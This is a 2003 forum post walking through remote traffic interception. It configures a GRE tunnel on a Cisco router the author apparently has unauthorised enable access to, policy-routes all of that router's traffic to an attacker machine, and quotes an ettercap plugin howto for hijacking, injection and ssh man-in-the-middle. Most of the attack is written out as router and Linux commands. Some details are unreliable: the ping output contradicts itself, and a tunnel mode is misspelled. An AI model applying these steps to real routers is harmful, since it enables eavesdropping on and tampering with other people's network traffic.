I've experimented with GRE sniffing a bit, without having the luxary of having a router at home. This is possible using linux. A quick copy / paste from my site:
Ok, This is the story:
I was fascinated by the thought of remote GRE sniffing, and was planning to buy a 2nd hand router in order to do attempt this. I later found out that GRE tunnels are supported by the Linux Kernel.
I recompiled the kernel with :
+GRE tunnel Support
+Advanced routing
+Policy Routing
I then go to "my" remote router and create a GRE tunnel:
Code:
User Access Verification
Password:
Cisco2501>en
Password:
Cisco2501#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Cisco2501(config)#int tunnel 0
Cisco2501(config-if)#ip address 1.1.1.1 255.255.255.0
Cisco2501(config-if)#tunnel source eth0
Cisco2501(config-if)#tunnel dest <attacker IP>
Cisco2501(config-if)#tunnel mode gre ip
Cisco2501(config-if)#exit
Cisco2501(config)#
I then create a Tunnel on the attaker machine (Linux) :
Code:
#iptunnel add mynet mode grc remote <Attacked Router IP> local <Attacking IP> ttl 255
#ip addr add 1.1.1.2/24 dev mynet
#route add -net 1.1.1.0 netmask 255.255.255.0 dev mynet
#ifconfig mynet up
I find that i can then ping the other side of the tunnel (the router):
Code:
bash-2.05b# ping 1.1.1.1
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=255 time=242 ms
64 bytes from 1.1.1.1: icmp_seq=2 ttl=255 time=234 ms
64 bytes from 1.1.1.1: icmp_seq=3 ttl=255 time=243 ms
64 bytes from 1.1.1.1: icmp_seq=4 ttl=255 time=239 ms
--- 1.1.1.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.234/0.239/0.243/0.015 ms
bash-2.05b#
I then tried do to some policy routing on the Router (to direct all traffic to my attacking machine via the tunnel):
Code:
Cisco2501#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Cisco2501(config)#access-list 120 permit ip any any
Cisco2501(config)#route-map own3d
Cisco2501(config-route-map)#match ip address 120
Cisco2501(config-route-map)#set ip next-hop 1.1.1.2
Cisco2501(config-route-map)#exit
Cisco2501(config)#int eth0
Cisco2501(config-if)#ip policy route-map own3d
Cisco2501(config-if)#exit
I then attempt to configure route mapping on linux:
Code:
#ip ru add from 1.1.1.1 lookup 4
#ip ro add 0.0.0.0/0 via 1.1.1.2 table 4
I then try to sniff GRE traffic, and nothing apprears.
I've even tried ettercap, which can supposedly sniff remote GRE traffic:
This is from the ettercap GRE plugin howto:
********************************************************************************
************
-- ZARATAN PLUGIN HOWTO --
This plugin is usefull to sniff, as local, GRE-redirected remote traffic.
You can use it in normal sniffing mode or even in ARPsniffing to make mitm
attacks on remote traffic (like filtering/hijacking/injection or ssh-mitm)
The basic idea is to create a GRE tunnel that sends all the traffic on router
interface to your machine...then zaratan will decapsulate it and re-route it
for you.
First of all you have to have an "enable" access on a remote cisco router then..
..
--If you want to use it in ARP mode:
Edit the etter.conf file.
Insert in the OPTIONS field "-H <gateway_ip>".
Comment all the other unusefull fields.
Set the GWIP field with your gateway's ip again.
Now launch ettercap -e etter.conf.
Select the gateway as SOURCE and press 'a' button.
Activate zaratan plugin and deactivate all other plugins (it's more secure).
Ping your gateway and you will see the plugin output
"Redirect tunnel to x.x.x.x".
Remember this IP (later known as FakeIP).
--If you want to use it in normal sniffing mode:
Simply launch ettercap then press 's' button and activate zaratan plugin.
Ping your gateway and you will see again plugin output
"Rediret tunnel to x.x.x.x"
Once again this is our FakeIP.
Now on the remote cisco router....
Set up the tunnel0 interface with mode GRE ip encapsulation.
Set up, as source, router's serial interface and, as dest, our FakeIP.
Setup an access list that permits hosts and ports you want to sniff
(tcp any any for example) but not the traffic with type of srvice equal to 7,
cause all the traffic redirected/generated from zaratan has this tos,
and we don't want to redirect it again in the tunnel
(pay attention to traffic direction!).
Set up a route-map that has previous access list and, as next-hop, an ip
address on the same subnet of the tunnel0's ip address.
Set up the route-map on both serial and ethernet interface of the router.
Have fun.
--------------------------------------------------------------------------
We have intentionally omitted a step-by-step router configuration to avoid
kiddies-use of this tool. You have at least to know basic cisco router
configuration and to understand basically how this plugin works to play
this trick.
--------------------------------------------------------------------------
Remember that you have to bind, on your machine, a public address or a
static natted one, cause the router has to reach our FakeIP.
You can use it even on a PPP connection if you have two machines,
something like ipchains and a hub (btw you can think about it by yourself)
********************************************************************************
*************
Hope you find this useful,
Muts
www.secureit.co.il
Sign In
Register
Help
Posted 31 December 2003 - 06:31 AM
MultiQuote
Posted 02 January 2004 - 01:15 PM
Posted 22 January 2004 - 12:06 AM
